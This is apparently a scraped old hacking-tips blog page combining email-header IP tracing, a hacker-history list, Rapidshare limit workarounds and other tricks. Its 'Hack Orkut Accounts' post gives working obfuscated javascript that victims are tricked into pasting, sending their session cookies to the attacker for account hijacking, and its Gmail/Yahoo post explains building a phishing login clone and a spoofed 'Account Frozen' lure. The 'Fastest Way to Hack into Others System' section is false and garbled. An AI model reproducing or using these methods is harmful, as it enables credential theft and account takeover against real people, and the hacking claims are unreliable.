10) OrkutPlus! – Orkut plus is really a Plus to Orkut they are providing Best Compilation of Orkut Hacks, Tips-Tricks and Cheat Scripts ! as they are publishing
11) Devils workshop – This blog contains not only tips and tricks for Orkut it also having some best collection for My space, You tube, Google, Ad sense, and many more. More over I like the labels cloud on that blog
12) Digital Me – this blog just started before 2 months but it contains wide range of softwares, Java scripts, GM scripts, etc..
I’m still having many collection of website but this dozen of sites will do all what you want to known about orkut, so it wont be useful even if I provide more, from this website you can communication in orkut reaches next generation


 

Find IP info using Gmail/Yahoo/Hotmail :)




When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.


First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [129.130.1.1]
Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the email headers,

  • Click on the inverted triangle beside Reply. Select Show Orginal.
4. manually find the IP address, proceed to 5.
5. Look for Received: from followed by the IP address between square brackets [ ].

Received: from [69.138.30.1] by web4587.mail.***.yahoo.com
6. If you find more than one Received: from patterns, select the last one.
7. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

  • Click on Options on the top-right corner
  • In the Mail Options page, click on General Preferences
  • Scroll down to Messages where you have the Headers option
  • Make sure that Show all headers on incoming messages is selected
  • Click on the Save button
  • Go back to the mails and open that mail
5. You should see similar headers like above
Or if you want to manually find the IP address, proceed to 6.
6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender.

If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.

7. Track the IP address of the sender

Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

  • Click on Options on the top-right corner
  • In the Mail Options page, click on Mail Display Settings
  • In Message Headers, make sure Advanced option is checked
  • Click on Ok button
  • Go back to the mails and open that mail
5. You should see the email headers now.
6. manually find the IP address, proceed to 7.
7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address

Hotmail headers

In this case the IP address of the sender is [68.34.60.59].

8. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers
Look for Received: from followed by IP address within square brackets[
In this case, the IP address of the sender is [69.140.7.58].

9. Or else if you have headers like this

Hotmail headers

Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail).

10. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
11. Track the IP address of the sender
 

Top 10 Hacks of all time




Here is a list off the top 10 hacks of all time.
Early 1990s
Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world’s top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.
 
November 2002

Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a “fast-track extradition” to the US where he is a wanted man. The next hearing in the case is slated for today.
 
1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online – he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.
 
1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city’s telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.
 
1983
Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network.
 
1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a “logic bomb” to explode that deleted software running Omega’s manufacturing operations. Omega lost $10 million due to the attack.
 
1988
Twenty-three-year-old Cornell University graduate Robert Morris unleashed the first Internet worm on to the world. Morris released 99 lines of code to the internet as an experiment, but realised that his program infected machines as it went along. Computers crashed across the US and elsewhere. He was arrested and sentenced in 1990.
 
1999
The Melissa virus was the first of its kind to wreak damage on a global scale. Written by David Smith (then 30), Melissa spread to more than 300 companies across the world completely destroying their computer networks. Damages reported amounted to nearly $400 million. Smith was arrested and sentenced to five years in prison.
 
2000
MafiaBoy, whose real identity has been kept under wraps because he is a minor, hacked into some of the largest sites in the world, including eBay, Amazon and Yahoo between February 6 and Valentine’s Day in 2000. He gained access to 75 computers in 52 networks, and ordered a Denial of Service attack on them. He was arrested in 2000.
 
1993
They called themselves Masters of Deception, targeting US phone systems. The group hacked into the National Security Agency, AT&T, and Bank of America. It created a system that let them bypass long-distance phone call systems, and gain access to the pbx of major carriers.
 

Yahoo Multiple Login



This is really amazing trick. You might have never thought that anybody could ever login to more than one Yahoo accounts at the same time but now its is true and the trick is really very simple.

To login to more than one yahoo accounts what you need to do is just do the following

1) Goto the site : http://www.mediafire.com/?1f9sm34rj5z .
2) Download multiplelogin.exe and install it .
3) And then Open Yahoo Messenger.
Enjoy!!
 

How Safe is Your Computer?



pc-security.jpg
Security Facts about an average computer user
  • 70% users Install a lot of softwares or games which he finds interesting.
  • 80%of the user are not ready to update their system with latest patches.
  • 60% of the user don’t know if there system is secure.
  • 70% user don’t know how to find if the system is really secure

So how do you find if your system is secure and patched with latest patches and updates. Security System Analyzer (SSA) is a tool designed to check your system for the latest security updates. This tool can scan your system and find out the vulnerabilities about the missing patches and updates and provide you a link from where to get.
Features of SSA
  1. Finds security vulnerabilities and the missing patches for windows.
  2. Gives a direct link to possible patches to be used to remove the security hole.
  3. Supports Windows 2000, XP, Vista.
  4. One click to get the information about latest security vulnerabilities and others.
  5. Generates HTML reports which makes view easy and can be exported.
Open Vulnerability and Assessment Language (OVAL) is an international, information security, community standard to promote open and publicly available security content, and to standardize the transfer of this information across the entire spectrum of security tools and services. OVAL includes a language used to encode system details, and an assortment of content repositories held throughout the community.
ssa-startup.png
How SSA works?
This software completes the whole process in 3 steps:
  1. Representing configuration information of systems for testing;
  2. Analyzing the system for the presence of the specified machine state (vulnerability, configuration, patch state, etc.)
  3. Reporting the results of this assessment
ssa-update.png
Resources
This tool has an excellent feedback and does not require any user to be geeky. You just need to run the tool and find out whats not secured.
So how you keep track of your PC security? Do share with us in comments and we can discuss.
 

Hack Orkut Accounts




First get firefox and the cookie editor plugin for it…u will need them…
Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..
Now here is the script Code:
HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
1) Go to YOUR ALBUM section.
2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg
3) There will be a eight digit value.
4) Now put that value in the above javascript.
5) Thats it.
Now your javascript will look like:
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()
Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.
Now after getting a cookie…
1) Go to your home page
2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).
3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.
4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…
5) THATS IT!!
ANOTHER SCRIPT : (100%working)
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action=’scrapbook.aspx?Action.submit’;nobody.submit()
Put ur eight digit number in the place of (53093255)
 

How to Hack Gmail or Yahoo or Hotmail .etc JOhn MEtHOD






In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack. But in this new version this problem is eliminated and this is has become more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.
Now follow the following steps :
  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.
First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.
Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.
If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !
 

Fastest Way to Hack into Others System





Well as I already mentioned you can hack any system which is connected to what we call “The INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.
Steps: -
  1. Download the Software PORT SCANNER from google.
  2. Get the IP address of the victim whose port is open.
  3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….
  4. The IP of victim u found initially into NETLAB .
  5. Thats it now you can access his system.
 

Hacks to Beat Rapidshare Download Limits and Waiting Time






Rapidshare has been an excellent tool for sharing large files. Recently users have discovered ways of bypassing the download limits and skipping the waiting time. Here are a description of these methods.
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this:
1. Short-Out the JavaScript:
    1. Goto the page you want to download
    2. Select FREE button
    3. In the address bar put the following: javascript:alert(c=0)
    4. Click OK
    5. Click OK to the pop-up box
    6. Enter the captcha
    7. Download Your File
2. Request a new IP address from your ISP server.
    Here’s how to do it in windows:
    1. Click Start
    2. Click run
    3. In the run box type cmd.exe and click OK
    4. When the command prompt opens type the following. ENTER after each new line.
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit
    5. Erase your cookies in whatever browser you are using.
    6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.
3. Use a proxy with SwitchProxy and Firefox:
4. Use an anonymous service:
    Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.
5. You can use a bookmarklet to stop your wait times:
    1. Open IE
    2. Right Click On This Link
    3. Select Add to Favorites
    4. Select Yes to the warning that the bookmark may be unsafe.
    5. Name it “RapidShare No Wait”
    6. Click on the Links folder (if you want to display it in your IE toolbar)
    7. Click OK
    8. You may need to close and reopen IE to see it
    9. Goto rapidshare and click the bookmarklet when you are forced to wait